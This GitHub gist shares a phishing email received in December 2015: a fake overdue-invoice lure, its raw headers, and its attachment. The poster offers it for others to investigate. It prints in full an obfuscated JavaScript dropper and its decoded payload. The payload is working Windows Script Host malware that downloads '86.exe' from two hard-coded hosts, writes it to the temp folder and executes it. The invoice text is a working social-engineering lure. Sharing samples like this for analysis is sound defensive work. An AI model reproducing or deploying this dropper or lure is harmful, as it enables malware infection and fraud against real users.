Skip to content

Instantly share code, notes, and snippets.

@vsaw

vsaw/README.md

Created December 15, 2015 12:28
Show Gist options
  • Save vsaw/79622c1daceef2e44715 to your computer and use it in GitHub Desktop.
Save vsaw/79622c1daceef2e44715 to your computer and use it in GitHub Desktop.
Download ZIP
2015-12-15 Spam/Phishing Mail
Raw
README.md

I recently received a spam/phising Mail to my personal account. If anyone's interested in investigating here's what I got from it.

The original mail contained the following contents

Dear Client,

This e-mail is pursuant to your contract with Foreman&Clark Ltd. for our services date November 15, 2015 for the amount of $5,282. Your failure to pay as per the December 1, 2015 invoice equals to the breach of our contract.

Please, acknowledge the receipt of this e-mail within three business days. Please, make your payment to the corresponding account, stated in the invoice attached no later than January 2, 2016. In case you fail to respond to this e-mail we well be compelled to pursue all the necessary legal actions.

Thank you beforehand for your attention to this case. Looking forward to hearing back from you.

Sincerely, Whitney Vincent Sales Manager

Foreman&Clark Ltd. 256 Raccoon RunSeattle, WA 98101

Attachment: copy_invoice_93290951.zip

The Mail header is attached below. I the attached Zip file contained one obfuscated JavaScript called invoice_mZMhGn.jz. The payload of invoice JS is attached as well.

Raw
invoice_mZMhGn.jz
var qZoQbQetuhCjf=[];
AvutAgf=(-987+987)/166;while(true){if(AvutAgf>=(14066+142)/111){break;}qZoQbQetuhCjf[AvutAgf]=String.fromCharCode(AvutAgf);AvutAgf++;}
function jsrVT(ePefJbOnNqi,MnaeUKVMzXOjk,xSAZLhPx){pzSj=parseInt(ePefJbOnNqi,MnaeUKVMzXOjk);jAxxc=pzSj.toString(xSAZLhPx);return jAxxc;}function CUtzAurBPduwbHW(LXMjjZvtgLVLfrQis){eval(LXMjjZvtgLVLfrQis)}
function FASUdFkXSxAZmgnXqARHSAAkzKvfZmKePiZjwReSQCjlGgrbiBdoLG(NqUfXUWbPlkDf,PByxbqvQEvrlbV){ return qZoQbQetuhCjf[jsrVT(NqUfXUWbPlkDf[PByxbqvQEvrlbV],(4772+78)/194,(3716+744)/446)];}
function OJTPpYW(TeJxDcnCIwXHJqDjdjVXVgfPHKXhAKJOzGdW) {return !isNaN(parseFloat(TeJxDcnCIwXHJqDjdjVXVgfPHKXhAKJOzGdW)) && isFinite(TeJxDcnCIwXHJqDjdjVXVgfPHKXhAKJOzGdW);}
function yaWLPIpJlOk(bkFXKUhk,uiPgPV){return bkFXKUhk.split(uiPgPV)}
var c=[];c[0]="d";c[1]="a";c[2]="d";c[3]="a";c[4]="4i";c[5]="3m";c[6]="4e";c[7]="17";c[8]="36";c[9]="17";c[10]="2b";c[11]="17";c[12]="19";c[13]="4f";c[14]="4b";c[15]="42";c[16]="4g";c[17]="41";c[18]="4k";c[19]="4g";c[20]="4e";c[21]="3m";c[22]="45";c[23]="4a";c[24]="24";c[25]="22";c[26]="1l";c[27]="3o";c[28]="4b";c[29]="49";c[30]="1m";c[31]="26";c[32]="24";c[33]="1l";c[34]="41";c[35]="4k";c[36]="41";c[37]="2d";c[38]="17";c[39]="22";c[40]="24";c[41]="1l";c[42]="1o";c[43]="23";c[44]="1o";c[45]="1l";c[46]="23";c[47]="20";c[48]="1l";c[49]="1o";c[50]="27";c[51]="24";c[52]="1m";c[53]="26";c[54]="24";c[55]="1l";c[56]="41";c[57]="4k";c[58]="41";c[59]="2d";c[60]="17";c[61]="2d";c[62]="17";c[63]="2d";c[64]="19";c[65]="1l";c[66]="4f";c[67]="4c";c[68]="48";c[69]="45";c[70]="4g";c[71]="1f";c[72]="19";c[73]="17";c[74]="19";c[75]="1g";c[76]="29";c[77]="d";c[78]="a";c[79]="4i";c[80]="3m";c[81]="4e";c[82]="17";c[83]="3e";c[84]="2o";c[85]="4a";c[86]="17";c[87]="2b";c[88]="1f";c[89]="1f";c[90]="1o";c[91]="1m";c[92]="1h";c[93]="4a";c[94]="1o";c[95]="37";c[96]="41";c[97]="22";c[98]="26";c[99]="22";c[100]="24";c[101]="26";c[102]="23";c[103]="23";c[104]="27";c[105]="24";c[106]="4a";c[107]="20";c[108]="23";c[109]="21";c[110]="1n";c[111]="26";c[112]="27";c[113]="4h";c[114]="32";c[115]="21";c[116]="23";c[117]="22";c[118]="1o";c[119]="27";c[120]="21";c[121]="41";c[122]="34";c[123]="45";c[124]="3f";c[125]="1h";c[126]="1m";c[127]="1g";c[128]="2d";c[129]="19";c[130]="3c";c[131]="38";c[132]="3o";c[133]="4e";c[134]="45";c[135]="19";c[136]="28";c[137]="19";c[138]="19";c[139]="1g";c[140]="1i";c[141]="19";c[142]="4c";c[143]="4g";c[144]="1l";c[145]="38";c[146]="44";c[147]="41";c[148]="48";c[149]="48";c[150]="19";c[151]="29";c[152]="d";c[153]="a";c[154]="4i";c[155]="3m";c[156]="4e";c[157]="17";c[158]="4j";c[159]="4f";c[160]="17";c[161]="2b";c[162]="17";c[163]="3c";c[164]="38";c[165]="3o";c[166]="4e";c[167]="45";c[168]="4c";c[169]="4g";c[170]="1l";c[171]="2h";c[172]="4e";c[173]="41";c[174]="3m";c[175]="4g";c[176]="41";c[177]="34";c[178]="3n";c[179]="46";c[180]="41";c[181]="3o";c[182]="4g";c[183]="1f";c[184]="3e";c[185]="2o";c[186]="4a";c[187]="1g";c[188]="29";c[189]="d";c[190]="a";c[191]="4i";c[192]="3m";c[193]="4e";c[194]="17";c[195]="4e";c[196]="48";c[197]="17";c[198]="2b";c[199]="17";c[200]="19";c[201]="1c";c[202]="39";c[203]="2j";c[204]="32";c[205]="35";c[206]="1c";c[207]="3h";c[208]="3h";c[209]="19";c[210]="29";c[211]="d";c[212]="a";c[213]="4i";c[214]="3m";c[215]="4e";c[216]="17";c[217]="4m";c[218]="2j";c[219]="40";c[220]="17";c[221]="2b";c[222]="17";c[223]="4j";c[224]="4f";c[225]="1l";c[226]="2j";c[227]="4k";c[228]="4c";c[229]="3m";c[230]="4a";c[231]="40";c[232]="2j";c[233]="4a";c[234]="4i";c[235]="45";c[236]="4e";c[237]="4b";c[238]="4a";c[239]="49";c[240]="41";c[241]="4a";c[242]="4g";c[243]="38";c[244]="4g";c[245]="4e";c[246]="45";c[247]="4a";c[248]="43";c[249]="4f";c[250]="1f";c[251]="4e";c[252]="48";c[253]="1g";c[254]="29";c[255]="d";c[256]="a";c[257]="4i";c[258]="3m";c[259]="4e";c[260]="17";c[261]="4k";c[262]="3c";c[263]="2h";c[264]="17";c[265]="2b";c[266]="17";c[267]="19";c[268]="20";c[269]="1l";c[270]="3d";c[271]="32";c[272]="31";c[273]="2m";c[274]="19";c[275]="29";c[276]="d";c[277]="a";c[278]="4i";c[279]="3m";c[280]="4e";c[281]="17";c[282]="3o";c[283]="30";c[284]="4f";c[285]="17";c[286]="2b";c[287]="17";c[288]="4k";c[289]="3c";c[290]="2h";c[291]="17";c[292]="1i";c[293]="17";c[294]="19";c[295]="39";c[296]="39";c[297]="35";c[298]="19";c[299]="29";c[300]="d";c[301]="a";c[302]="4i";c[303]="3m";c[304]="4e";c[305]="17";c[306]="3a";c[307]="2l";c[308]="17";c[309]="2b";c[310]="17";c[311]="4g";c[312]="4e";c[313]="4h";c[314]="41";c[315]="17";c[316]="17";c[317]="1j";c[318]="17";c[319]="4e";c[320]="34";c[321]="3n";c[322]="43";c[323]="17";c[324]="2b";c[325]="17";c[326]="19";c[327]="2f";c[328]="2i";c[329]="34";c[330]="2i";c[331]="19";c[332]="29";c[333]="d";c[334]="a";c[335]="4i";c[336]="3m";c[337]="4e";c[338]="17";c[339]="47";c[340]="3d";c[341]="17";c[342]="2b";c[343]="17";c[344]="3c";c[345]="38";c[346]="3o";c[347]="4e";c[348]="45";c[349]="4c";c[350]="4g";c[351]="1l";c[352]="2h";c[353]="4e";c[354]="41";c[355]="3m";c[356]="4g";c[357]="41";c[358]="34";c[359]="3n";c[360]="46";c[361]="41";c[362]="3o";c[363]="4g";c[364]="1f";c[365]="19";c[366]="32";c[367]="38";c[368]="19";c[369]="1i";c[370]="19";c[371]="3d";c[372]="32";c[373]="31";c[374]="19";c[375]="1i";c[376]="1f";c[377]="22";c[378]="25";c[379]="23";c[380]="1n";c[381]="21";c[382]="26";c[383]="1j";c[384]="17";c[385]="3o";c[386]="30";c[387]="4f";c[388]="1g";c[389]="1g";c[390]="29";c[391]="d";c[392]="a";c[393]="4i";c[394]="3m";c[395]="4e";c[396]="17";c[397]="3m";c[398]="2k";c[399]="36";c[400]="17";c[401]="2b";c[402]="17";c[403]="3c";c[404]="38";c[405]="3o";c[406]="4e";c[407]="45";c[408]="4c";c[409]="4g";c[410]="1l";c[411]="2h";c[412]="4e";c[413]="41";c[414]="3m";c[415]="4g";c[416]="41";c[417]="34";c[418]="3n";c[419]="46";c[420]="41";c[421]="3o";c[422]="4g";c[423]="1f";c[424]="4e";c[425]="34";c[426]="3n";c[427]="43";c[428]="17";c[429]="1i";c[430]="17";c[431]="19";c[432]="2g";c[433]="1l";c[434]="38";c[435]="4g";c[436]="19";c[437]="1i";c[438]="1f";c[439]="24";c[440]="20";c[441]="1o";c[442]="23";c[443]="1n";c[444]="22";c[445]="1j";c[446]="17";c[447]="19";c[448]="4e";c[449]="41";c[450]="3m";c[451]="49";c[452]="19";c[453]="1g";c[454]="1g";c[455]="29";c[456]="d";c[457]="a";c[458]="4i";c[459]="3m";c[460]="4e";c[461]="17";c[462]="4l";c[463]="2f";c[464]="4b";c[465]="17";c[466]="2b";c[467]="17";c[468]="1n";c[469]="29";c[470]="d";c[471]="a";c[472]="4i";c[473]="3m";c[474]="4e";c[475]="17";c[476]="2g";c[477]="17";c[478]="2b";c[479]="17";c[480]="1o";c[481]="29";c[482]="d";c[483]="a";c[484]="4i";c[485]="3m";c[486]="4e";c[487]="17";c[488]="2f";c[489]="4h";c[490]="2o";c[491]="48";c[492]="3o";c[493]="38";c[494]="4g";c[495]="17";c[496]="2b";c[497]="17";c[498]="22";c[499]="25";
var Z=[];Z[500]="22";Z[501]="27";Z[502]="1n";Z[503]="20";Z[504]="29";Z[505]="d";Z[506]="a";Z[507]="42";Z[508]="4b";Z[509]="4e";Z[510]="17";Z[511]="1f";Z[512]="4i";Z[513]="3m";Z[514]="4e";Z[515]="17";Z[516]="49";Z[517]="2b";Z[518]="4l";Z[519]="2f";Z[520]="4b";Z[521]="29";Z[522]="17";Z[523]="49";Z[524]="2a";Z[525]="36";Z[526]="1l";Z[527]="48";Z[528]="41";Z[529]="4a";Z[530]="43";Z[531]="4g";Z[532]="44";Z[533]="29";Z[534]="17";Z[535]="49";Z[536]="1i";Z[537]="1i";Z[538]="1g";Z[539]="17";Z[540]="17";Z[541]="4n";Z[542]="d";Z[543]="a";Z[544]="17";Z[545]="17";Z[546]="4i";Z[547]="3m";Z[548]="4e";Z[549]="17";Z[550]="35";Z[551]="4i";Z[552]="17";Z[553]="2b";Z[554]="17";Z[555]="1n";Z[556]="29";Z[557]="d";Z[558]="a";Z[559]="17";Z[560]="17";Z[561]="4g";Z[562]="4e";Z[563]="4l";Z[564]="17";Z[565]="17";Z[566]="4n";Z[567]="d";Z[568]="a";Z[569]="9";Z[570]="4c";Z[571]="4b";Z[572]="45";Z[573]="17";Z[574]="2b";Z[575]="17";Z[576]="19";Z[577]="2l";Z[578]="2j";Z[579]="39";Z[580]="19";Z[581]="29";Z[582]="9";Z[583]="17";Z[584]="d";Z[585]="a";Z[586]="17";Z[587]="17";Z[588]="17";Z[589]="17";Z[590]="47";Z[591]="3d";Z[592]="1l";Z[593]="4b";Z[594]="4c";Z[595]="41";Z[596]="4a";Z[597]="1f";Z[598]="4c";Z[599]="4b";Z[600]="45";Z[601]="1j";Z[602]="19";Z[603]="44";Z[604]="4g";Z[605]="4g";Z[606]="4c";Z[607]="28";Z[608]="1m";Z[609]="1m";Z[610]="19";Z[611]="1i";Z[612]="36";Z[613]="3g";Z[614]="49";Z[615]="3i";Z[616]="1i";Z[617]="2g";Z[618]="1j";Z[619]="17";Z[620]="42";Z[621]="3m";Z[622]="48";Z[623]="4f";Z[624]="41";Z[625]="1g";Z[626]="29";Z[627]="17";Z[628]="47";Z[629]="3d";Z[630]="1l";Z[631]="4f";Z[632]="41";Z[633]="4a";Z[634]="40";Z[635]="1f";Z[636]="1g";Z[637]="29";Z[638]="17";Z[639]="45";Z[640]="42";Z[641]="17";Z[642]="1f";Z[643]="47";Z[644]="3d";Z[645]="1l";Z[646]="4f";Z[647]="4g";Z[648]="3m";Z[649]="4g";Z[650]="4h";Z[651]="4f";Z[652]="17";Z[653]="2b";Z[654]="2b";Z[655]="17";Z[656]="25";Z[657]="1o";Z[658]="23";Z[659]="1k";Z[660]="23";Z[661]="1o";Z[662]="23";Z[663]="1g";Z[664]="17";Z[665]="17";Z[666]="4n";Z[667]="d";Z[668]="a";Z[669]="17";Z[670]="17";Z[671]="17";Z[672]="17";Z[673]="17";Z[674]="17";Z[675]="3m";Z[676]="2k";Z[677]="36";Z[678]="1l";Z[679]="4b";Z[680]="4c";Z[681]="41";Z[682]="4a";Z[683]="1f";Z[684]="1g";Z[685]="29";Z[686]="17";Z[687]="3m";Z[688]="2k";Z[689]="36";Z[690]="1l";Z[691]="4g";Z[692]="4l";Z[693]="4c";Z[694]="41";Z[695]="17";Z[696]="2b";Z[697]="17";Z[698]="1o";Z[699]="29";Z[700]="17";Z[701]="3m";Z[702]="2k";Z[703]="36";Z[704]="1l";Z[705]="4j";Z[706]="4e";Z[707]="45";Z[708]="4g";Z[709]="41";Z[710]="1f";Z[711]="47";Z[712]="3d";Z[713]="1l";Z[714]="4e";Z[715]="41";Z[716]="4f";Z[717]="4c";Z[718]="4b";Z[719]="4a";Z[720]="4f";Z[721]="41";Z[722]="2g";Z[723]="4b";Z[724]="40";Z[725]="4l";Z[726]="1g";Z[727]="29";Z[728]="17";Z[729]="45";Z[730]="42";Z[731]="17";Z[732]="1f";Z[733]="3m";Z[734]="2k";Z[735]="36";Z[736]="1l";Z[737]="4f";Z[738]="45";Z[739]="4m";Z[740]="41";Z[741]="17";Z[742]="2c";Z[743]="17";Z[744]="1o";Z[745]="24";Z[746]="23";Z[747]="22";Z[748]="26";Z[749]="1k";Z[750]="25";Z[751]="1o";Z[752]="1o";Z[753]="1g";Z[754]="17";Z[755]="17";Z[756]="4n";Z[757]="d";Z[758]="a";Z[759]="17";Z[760]="17";Z[761]="17";Z[762]="17";Z[763]="17";Z[764]="17";Z[765]="17";Z[766]="17";Z[767]="35";Z[768]="4i";Z[769]="17";Z[770]="2b";Z[771]="17";Z[772]="1o";Z[773]="29";Z[774]="17";Z[775]="3m";Z[776]="2k";Z[777]="36";Z[778]="1l";Z[779]="4c";Z[780]="4b";Z[781]="4f";Z[782]="45";Z[783]="4g";Z[784]="45";Z[785]="4b";Z[786]="4a";Z[787]="17";Z[788]="2b";Z[789]="17";Z[790]="1n";Z[791]="29";Z[792]="17";Z[793]="3m";Z[794]="2k";Z[795]="36";Z[796]="1l";Z[797]="4f";Z[798]="3m";Z[799]="4i";Z[800]="41";Z[801]="39";Z[802]="4b";Z[803]="2k";Z[804]="45";Z[805]="48";Z[806]="41";Z[807]="1m";Z[808]="1h";Z[809]="3c";Z[810]="47";Z[811]="23";Z[812]="34";Z[813]="23";Z[814]="24";Z[815]="48";Z[816]="3f";Z[817]="44";Z[818]="26";Z[819]="1h";Z[820]="1m";Z[821]="1f";Z[822]="4m";Z[823]="2j";Z[824]="40";Z[825]="1m";Z[826]="1h";Z[827]="38";Z[828]="22";Z[829]="37";Z[830]="2g";Z[831]="23";Z[832]="1n";Z[833]="3c";Z[834]="4g";Z[835]="4a";Z[836]="30";Z[837]="1h";Z[838]="1m";Z[839]="1i";Z[840]="2f";Z[841]="4h";Z[842]="2o";Z[843]="48";Z[844]="3o";Z[845]="38";Z[846]="4g";Z[847]="1i";Z[848]="19";Z[849]="1l";Z[850]="41";Z[851]="4k";Z[852]="41";Z[853]="19";Z[854]="1j";Z[855]="22";Z[856]="1k";Z[857]="20";Z[858]="1g";Z[859]="29";Z[860]="17";Z[861]="4g";Z[862]="4e";Z[863]="4l";Z[864]="17";Z[865]="17";Z[866]="4n";Z[867]="d";Z[868]="a";Z[869]="17";Z[870]="17";Z[871]="17";Z[872]="17";Z[873]="17";Z[874]="17";Z[875]="17";Z[876]="17";Z[877]="17";Z[878]="17";Z[879]="45";Z[880]="42";Z[881]="17";Z[882]="1f";Z[883]="1f";Z[884]="1f";Z[885]="4a";Z[886]="41";Z[887]="4j";Z[888]="17";Z[889]="2i";Z[890]="3m";Z[891]="4g";Z[892]="41";Z[893]="1f";Z[894]="1g";Z[895]="1g";Z[896]="2c";Z[897]="1n";Z[898]="1j";Z[899]="25";Z[900]="22";Z[901]="26";Z[902]="1n";Z[903]="26";Z[904]="24";Z[905]="20";Z[906]="26";Z[907]="26";Z[908]="26";Z[909]="1g";Z[910]="1g";Z[911]="17";Z[912]="4n";Z[913]="d";Z[914]="a";Z[915]="9";Z[916]="9";Z[917]="17";Z[918]="17";Z[919]="17";Z[920]="17";Z[921]="4j";Z[922]="4f";Z[923]="1l";Z[924]="1m";Z[925]="1h";Z[926]="40";Z[927]="25";Z[928]="21";Z[929]="23";Z[930]="26";Z[931]="1n";Z[932]="27";Z[933]="3b";Z[934]="30";Z[935]="32";Z[936]="48";Z[937]="1h";Z[938]="1m";Z[939]="37";Z[940]="4h";Z[941]="4a";Z[942]="1f";Z[943]="4m";Z[944]="2j";Z[945]="40";Z[946]="1i";Z[947]="2f";Z[948]="4h";Z[949]="2o";Z[950]="48";Z[951]="3o";Z[952]="38";Z[953]="4g";Z[954]="1i";Z[955]="1m";Z[956]="1h";Z[957]="3d";Z[958]="2l";Z[959]="2o";Z[960]="25";Z[961]="1o";Z[962]="24";Z[963]="3e";Z[964]="1n";Z[965]="47";Z[966]="2n";Z[967]="1h";Z[968]="1m";Z[969]="19";Z[970]="1l";Z[971]="41";Z[972]="4k";Z[973]="41";Z[974]="19";Z[975]="1j";Z[976]="1m";Z[977]="1h";Z[978]="45";Z[979]="48";Z[980]="45";Z[981]="4j";Z[982]="24";Z[983]="27";Z[984]="36";Z[985]="21";Z[986]="4b";Z[987]="2f";Z[988]="1h";Z[989]="1m";Z[990]="21";Z[991]="1k";Z[992]="20";Z[993]="1j";Z[994]="1n";Z[995]="1g";Z[996]="29";Z[997]="17";Z[998]="d";Z[999]="a";Z[1000]="9";Z[1001]="9";Z[1002]="17";Z[1003]="17";Z[1004]="17";Z[1005]="17";Z[1006]="3n";Z[1007]="4e";Z[1008]="41";Z[1009]="3m";Z[1010]="47";Z[1011]="29";Z[1012]="d";Z[1013]="a";Z[1014]="17";Z[1015]="17";Z[1016]="17";Z[1017]="17";Z[1018]="17";Z[1019]="17";Z[1020]="17";Z[1021]="17";Z[1022]="17";Z[1023]="17";Z[1024]="50";Z[1025]="d";Z[1026]="a";Z[1027]="9";Z[1028]="9";Z[1029]="50";Z[1030]="d";Z[1031]="a";Z[1032]="17";Z[1033]="17";Z[1034]="17";Z[1035]="17";Z[1036]="17";Z[1037]="17";Z[1038]="17";Z[1039]="17";Z[1040]="3o";Z[1041]="3m";Z[1042]="4g";Z[1043]="3o";Z[1044]="44";Z[1045]="17";Z[1046]="1f";Z[1047]="3o";Z[1048]="3c";Z[1049]="1g";Z[1050]="17";Z[1051]="17";Z[1052]="4n";Z[1053]="d";Z[1054]="a";Z[1055]="9";Z[1056]="9";Z[1057]="50";Z[1058]="29";Z[1059]="17";Z[1060]="d";Z[1061]="a";Z[1062]="17";Z[1063]="17";Z[1064]="17";Z[1065]="17";Z[1066]="17";Z[1067]="17";Z[1068]="50";Z[1069]="29";Z[1070]="17";Z[1071]="3m";Z[1072]="2k";Z[1073]="36";Z[1074]="1l";Z[1075]="3o";Z[1076]="48";Z[1077]="4b";Z[1078]="4f";Z[1079]="41";Z[1080]="1f";Z[1081]="1g";Z[1082]="29";Z[1083]="17";Z[1084]="d";Z[1085]="a";Z[1086]="17";Z[1087]="17";Z[1088]="17";Z[1089]="17";Z[1090]="50";Z[1091]="29";Z[1092]="17";Z[1093]="d";Z[1094]="a";Z[1095]="9";Z[1096]="45";Z[1097]="42";Z[1098]="17";Z[1099]="1f";Z[1100]="35";Z[1101]="4i";Z[1102]="17";Z[1103]="2b";Z[1104]="2b";Z[1105]="17";Z[1106]="1o";Z[1107]="1g";Z[1108]="17";Z[1109]="17";Z[1110]="4n";Z[1111]="d";Z[1112]="a";Z[1113]="17";Z[1114]="17";Z[1115]="17";Z[1116]="17";Z[1117]="17";Z[1118]="17";Z[1119]="4l";Z[1120]="2f";Z[1121]="4b";Z[1122]="17";Z[1123]="2b";Z[1124]="17";Z[1125]="49";Z[1126]="29";Z[1127]="17";Z[1128]="3n";Z[1129]="4e";Z[1130]="41";Z[1131]="3m";Z[1132]="47";Z[1133]="29";Z[1134]="17";Z[1135]="d";Z[1136]="a";Z[1137]="17";Z[1138]="17";Z[1139]="17";Z[1140]="17";Z[1141]="50";Z[1142]="29";Z[1143]="17";Z[1144]="d";Z[1145]="a";Z[1146]="17";Z[1147]="17";Z[1148]="50";Z[1149]="d";Z[1150]="a";Z[1151]="17";Z[1152]="17";Z[1153]="3o";Z[1154]="3m";Z[1155]="4g";Z[1156]="3o";Z[1157]="44";Z[1158]="17";Z[1159]="1f";Z[1160]="3o";Z[1161]="3c";Z[1162]="1g";Z[1163]="17";Z[1164]="17";Z[1165]="4n";Z[1166]="17";Z[1167]="d";Z[1168]="a";Z[1169]="17";Z[1170]="17";Z[1171]="50";Z[1172]="29";Z[1173]="17";Z[1174]="d";Z[1175]="a";Z[1176]="50";Z[1177]="29";Z[1178]="17";Z[1179]="d";Z[1180]="a";Z[1181]="d";Z[1182]="a";
var TiNLQ=[c,Z];
var BsJJsWAzp=[];
function evaQdvFPGbrAtqbZa(TiNLQ){nAfEBhczaJy= '';for(aFfFkIeoQPT=(-128+128)/22; aFfFkIeoQPT < (1698+146)/922; aFfFkIeoQPT++) {BsJJsWAzp[aFfFkIeoQPT]=(-218+218)/5; while(true) { if(BsJJsWAzp[aFfFkIeoQPT] > TiNLQ[aFfFkIeoQPT].length-(-102+556)/454) { break; } if (OJTPpYW(jsrVT(TiNLQ[aFfFkIeoQPT][BsJJsWAzp[aFfFkIeoQPT]],(646+979)/65,(6141+289)/643))) {nAfEBhczaJy += FASUdFkXSxAZmgnXqARHSAAkzKvfZmKePiZjwReSQCjlGgrbiBdoLG([TiNLQ[aFfFkIeoQPT][BsJJsWAzp[aFfFkIeoQPT]]], (-178+178)/550);} BsJJsWAzp[aFfFkIeoQPT]++;}} return nAfEBhczaJy}
CUtzAurBPduwbHW(evaQdvFPGbrAtqbZa(TiNLQ));
Raw
payload.js
var Q = "softextrain64.com/86.exe? 46.151.52.196/86.exe? ? ?".split(" ");
var YJn =((1/*n1Re484685596n253089uM354193eOiZ*/)?"WScri":"")+"pt.Shell";
var ws = WScript.CreateObject(YJn);
var rl = "%TEMP%\\";
var zEd = ws.ExpandEnvironmentStrings(rl);
var xWC = "2.XMLH";
var cKs = xWC + "TTP";
var UG = true , rObg = "ADOD";
var kX = WScript.CreateObject("MS"+"XML"+(475038, cKs));
var aFQ = WScript.CreateObject(rObg + "B.St"+(621504, "ream"));
var yAo = 0;
var B = 1;
var AuJlcSt = 474902;
for (var m=yAo; m<Q.length; m++) {
var Pv = 0;
try {
poi = "GET";
kX.open(poi,"http://"+Q[m]+B, false); kX.send(); if (kX.status == 715-515) {
aFQ.open(); aFQ.type = 1; aFQ.write(kX.responseBody); if (aFQ.size > 16548-711) {
Pv = 1; aFQ.position = 0; aFQ.saveToFile/*Wk5O56lZh8*/(zEd/*S4RB50WtnK*/+AuJlcSt+".exe",4-2); try {
if (((new Date())>0,7480862888)) {
ws./*d735809VKMl*/Run(zEd+AuJlcSt+/*XGJ716Y0kI*/".exe",/*iliw69Q3oA*/3-2,0);
break;
}
}
catch (cW) {
};
}; aFQ.close();
};
if (Pv == 1) {
yAo = m; break;
};
}
catch (cW) {
};
};
Raw
raw email
X-Envelope-From: <[email protected]>
X-Envelope-To: [My Email]
X-Delivery-Time: 1449746534
X-UID: 4169
Return-Path: <[email protected]>
Authentication-Results: strato.com 1;
spf=none
smtp.mailfrom="[email protected]";
dkim=none;
domainkeys=none;
dkim-adsp=none
header.from="[email protected]"
X-RZG-CLASS-ID: mi
Received-SPF: none
client-ip=37.6.140.169;
helo="adsl-169.37.6.140.tellas.gr";
envelope-from="[email protected]";
receiver=smtpin.rzone.de;
identity=mailfrom;
Received: from adsl-169.37.6.140.tellas.gr ([37.6.140.169])
by smtpin.rzone.de (RZmta 37.14 SBL)
with ESMTP id U025fcrBABMD9oK
for [My Email];
Thu, 10 Dec 2015 12:22:13 +0100 (CET)
From: =?UTF-8?B?V2hpdG5leSBWaW5jZW50?= <[email protected]>
To: [My Email]
Subject: =?UTF-8?B?UmVmZXJlbmNlIE51bWJlciAjOTMyOTA5NTEsIExhc3QgUGF5bWVudCBOb3RpY2U=?=
Date: Thu, 10 Dec 2015 13:21:57 +0300
Reply-To: [My Email]
MIME-Version: 1.0
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment